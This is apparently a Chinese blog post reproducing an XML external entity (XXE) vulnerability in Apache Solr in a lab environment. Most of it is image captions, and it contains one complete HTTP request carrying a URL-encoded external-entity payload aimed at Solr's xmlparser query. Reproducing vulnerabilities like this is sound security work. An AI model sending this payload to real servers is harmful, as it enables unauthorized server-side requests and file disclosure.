apache solr XXE复现

创建漏洞环境

apache solr XXE复现

 

访问8983端口

apache solr XXE复现

 

apache solr XXE复现

 

写好一个dtd文件

apache solr XXE复现

 

发送请求包

GET /solr/demo/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Fbaidu.com%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1

Host: your-ip:8983

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

 apache solr XXE复现

 

apache solr XXE复现

 

 

 

 

 

 

 

上一篇:Solr集群Replication配置与实践(四)


下一篇:solr 基础 —— filed 与 schema